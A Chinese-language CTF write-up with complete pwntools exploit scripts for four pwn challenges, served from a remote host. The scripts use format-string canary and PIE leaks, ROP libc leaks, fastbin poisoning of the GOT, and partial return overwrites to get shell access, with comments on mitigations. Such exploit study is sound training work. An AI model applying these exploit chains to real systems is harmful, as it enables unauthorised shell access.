BF

首先覆盖掉seed,去掉rand()的随机化,然后通过输入的name进行格式化字符的泄漏,再通过rop串leak出libc_base,最后直接用one_gadgets getshell,exp如下:

from pwn import *
from LibcSearcher import *
# Exploit walk-through for "BF" (see the text above). Python 2 pwntools
# syntax (print statement, str payloads). Round 1: a format-string read
# leaks the stack canary and a code address, then a ROP chain calls puts
# on a GOT entry to leak libc. Round 2: the same overflow returns into a
# one_gadget.
#
# Defender's view: each step rests on a distinct weakness -- user input
# used as a printf format (leak), a stack write past the buffer (control),
# and a known canary value (bypass). Printing the name through a fixed
# "%s" format and bounding the read remove the first two; with them gone,
# the canary and PIE do their job.
a=[7427,39356,9595,54062,67371,42578,92585,76990,22615,53318,12615]  # expected rand() outputs once the seed is overwritten (per the text); only the first 10 are used
#p = process('./bf')
pop_rdi = 0xdb3  # offset of a `pop rdi; ret` gadget from the PIE image base (value taken from the writeup)
p = remote('111.33.164.4',50001)
p.sendline('1')

# '%17$p%23$p' prints two stack slots as pointers. The 18-byte filler and
# trailing p64(0) presumably are the seed overwrite described in the text
# -- TODO confirm against the binary's layout.
p.sendlineafter('name : ','%17$p%23$p'+'a'*18+p64(0))
for i in range(10):
    p.sendlineafter('guess:',str(a[i]))

p.recvuntil('0x')
canary = int(p.recv(16),16)  # first leaked slot: 16 hex digits = the 8-byte stack canary
p.recvuntil('0x')
vmmap = int(p.recv(12),16) - 0xabf  # second slot: a code pointer; 0xabf is its offset in the image, so this is presumably the PIE base
# Overflow: 0x34 filler, intact canary, fake saved rbp, then the chain
# pop rdi <- vmmap+0x202018 ; call vmmap+0x8A0 ; return to vmmap+0xabf.
# Given the puts address read back below, 0x202018/0x8A0 look like
# puts@got / puts@plt -- verify with the binary.
p.sendline('a'*0x34+p64(canary)+p64(0)+p64(vmmap+pop_rdi)+p64(vmmap+0x202018)+p64(vmmap+0x8A0)+p64(vmmap+0XAbf))

p.recv(4)
puts_addr= u64(p.recv(6)+'\x00\x00')  # 6 significant bytes of a little-endian pointer, zero-padded to 8
print hex(puts_addr)
obj = LibcSearcher('puts',puts_addr)  # identify the remote libc build from the leaked puts address
libc_base = puts_addr - obj.dump('puts')
print hex(libc_base)



# Round 2: same input path, this time without format specifiers in the name.
p.sendline('1')
p.sendlineafter('name : ','a'*28+p64(0))
print hex(vmmap+0x202018)  # debug output only
for i in range(10):
    p.sendlineafter('guess:',str(a[i]))
# Return address replaced by libc_base+0x41320, the one_gadget named in the text.
p.sendline('b'*0x34+p64(canary)+p64(0)+p64(libc_base+0x41320))

p.interactive()

pwn7

edit函数堆溢出,通过改fd破坏fastbin,申请到notes数组附近,利用了stderr高位是0x7f绕过check。然后把第0个格改为puts@got,show(0)来leak libc,再把第0个格改为atoi@got,edit(0)改为system,然后在传choice时传/bin/sh即可getshell。

from pwn import *
from LibcSearcher import *
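# Connection and binary metadata for the "pwn7" heap exploit below.
# The original spawned a local process on this line and then immediately
# rebound `p` to the remote socket, leaving an unused, never-closed child
# process behind. Keep the local tube as a commented-out debugging
# alternative instead, as the other scripts on this page do.
#p = process('./pwn')
p = remote('111.33.164.4',50007)
elf= ELF('./pwn')  # local copy of the challenge binary (symbols, GOT/PLT offsets)
libc = elf.libc  # the libc pwntools associates with ./pwn; not referenced further in the visible script
context.log_level='debug'  # dump every byte sent/received -- useful when re-deriving the offsets below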
def add(size):
    """Menu option 1 of the remote program: allocate a note of ``size`` bytes.

    Drives the module-level tube ``p``; each prompt string is the remote
    program's own menu text, so it must match byte for byte.
    """
    p.sendlineafter('choice >>', '1')
    p.sendlineafter('size:', str(size))
def show(index):
    """Menu option 2: print the note stored at slot ``index``.

    Only sends the request; the caller reads the echoed data from ``p``.
    """
    p.sendlineafter('choice >>', '2')
    p.sendlineafter('id:', str(index))
def edit(index,size,content):
    """Menu option 3: write ``content`` into slot ``index`` with a caller-chosen ``size``.

    ``size`` is sent as typed and is not tied to the slot's allocation here
    (the text above describes the resulting heap overflow). ``content`` is
    sent with a trailing newline, as ``sendline`` always does.
    """
    answers = (
        ('choice >>', '3'),
        ('id:', str(index)),
        ('size:', str(size)),
        ('content:', content),
    )
    for prompt, reply in answers:
        p.sendlineafter(prompt, reply)
def dell(index):
    """Menu option 4: free the note at slot ``index``."""
    p.sendlineafter('choice >>', '4')
    p.sendlineafter('id:', str(index))
#gdb.attach(p,'b *0x400cea')
# Phase 1: libc leak through a recycled chunk. Chunk 0 (0x80 request) is
# freed and re-allocated, and its stale contents are printed by show(0);
# the 6 bytes read back are presumably an arena pointer left by free()
# -- TODO confirm which bin. This leak is only printed; the libc base
# actually used later comes from LibcSearcher.
add(0x80)#0
add(0x80)#1
dell(0)
add(0x80)#0
show(0)
p.recvuntil('data:')
libc_base1 = u64(p.recv(6)+'\x00\x00')-0x3C4B78  # 0x3C4B78: the writeup's offset of that pointer from libc base
print hex(libc_base1)

# Phase 2: fastbin corruption via the edit() overflow (the text above).
# Chunk 3 is freed, then chunk 2 is edited with more bytes than it holds:
# 0x68 filler reaches chunk 3's size field (set to 0x7f), and the next
# 8 bytes set its fd to 0x6020bd. Per the text, the 0x7f high byte of the
# stderr pointer at that address passes malloc's size check, so a later
# allocation returns memory next to the notes array.
# Hardening that defeats this: bound edit() to the slot's recorded size,
# and keep the GOT read-only (full RELRO) so phase 3 has nothing to patch.
add(0x60)#2
add(0x60)#3
dell(3)
edit(2,0x80,'a'*0x68+p64(0x7f)+p64(0x6020bd))

one=[0x45216,0x4526a,0xf02a4,0xf1147]  # one_gadget candidates; not used by this script
add(0x60)#3
add(0x60)#4  # served from the poisoned fastbin: overlaps the notes array
edit(4,0x20,'a'*0x13+p64(0x602020))  # point slot 0 at 0x602020 (puts@got per the text)
show(0)

p.recvuntil('data:')

puts_addr = u64(p.recv(6)+'\x00\x00')  # slot 0 now prints the GOT entry: the resolved puts address
obj = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - obj.dump('puts')

print hex(libc_base)
# Phase 3: redirect atoi to system. Slot 0 is moved to 0x602068 (atoi@got
# per the text) and overwritten with system's address, so the next menu
# "choice" string is passed to system().
edit(1,10,'/bin/sh\x00')  # writes /bin/sh into note 1; not referenced afterwards
edit(4,0x20,'a'*0x13+p64(0x602068))
edit(0,0x20,p64(libc_base+obj.dump('system')))
p.recvuntil('choice >>')
p.sendline('/bin/sh\x00')

p.interactive()

pwn11

首先通过00截断绕过strcmp函数,然后就是栈溢出泄漏libc再getshell了。

from pwn import *
from LibcSearcher import *
#p = process('./pwn11')
p = remote('111.33.164.4',50011)
elf = ELF('./pwn11')  # local copy; supplies elf.got / elf.plt addresses
pop_rdi = 0x4012ab  # `pop rdi; ret` gadget at an absolute address, so the binary is presumably non-PIE
main = 0x401162  # returning here re-runs the vulnerable read so the overflow can be used twice



# Round 1: the first line is whatever the program reads first (presumably
# a name -- TODO confirm). In the second line 'abcd\x00' satisfies strcmp
# by terminating at the NUL (per the text) while the bytes after it keep
# filling the buffer: 0x1b filler, saved rbp, then puts(read@got) and a
# return to main. No canary is handled, so presumably none is present;
# a stack protector plus a length-bounded read would stop this chain.
p.sendline('nuoye')
p.sendline('abcd\x00'+'a'*0x1b+p64(0)+p64(pop_rdi)+p64(elf.got['read'])+p64(elf.plt['puts'])+p64(main))



p.recvuntil('ok!\n')
read_addr = u64(p.recv(6)+'\x00\x00')  # 6-byte little-endian pointer printed by puts, zero-padded to 8
obj = LibcSearcher('read',read_addr)  # identify the remote libc from the leaked read address
libc_base = read_addr-obj.dump('read')
print hex(libc_base)



# Round 2: same overflow, now calling system("/bin/sh") via the libc
# offsets LibcSearcher resolved for this build.
p.sendline('nuoye')
p.sendline('abcd\x00'+'a'*0x1b+p64(0)+p64(pop_rdi)+p64(libc_base+obj.dump('str_bin_sh'))+p64(libc_base+obj.dump('system'))+p64(main))
p.interactive()

pwn13

简单的栈溢出,可以看到有后门,开了PIE而已,所以覆盖下最低位即可。

from pwn import *

#p = process('./pwn13')
p = remote('111.33.164.4',50013)
p.sendline('1')
# 0x27 filler, one byte of saved rbp ('b'), then a single byte 0x50 that
# replaces only the lowest byte of the return address. This works because
# PIE randomises the page-aligned base, so the low 12 bits of every code
# address are fixed; the text says 0x50 lands on the backdoor function.
# No canary is handled, so presumably none is present -- a stack protector
# alone would catch this overwrite, and a bounded read removes it entirely.
p.send('a'*0x27+'b'+'\x50')
p.interactive()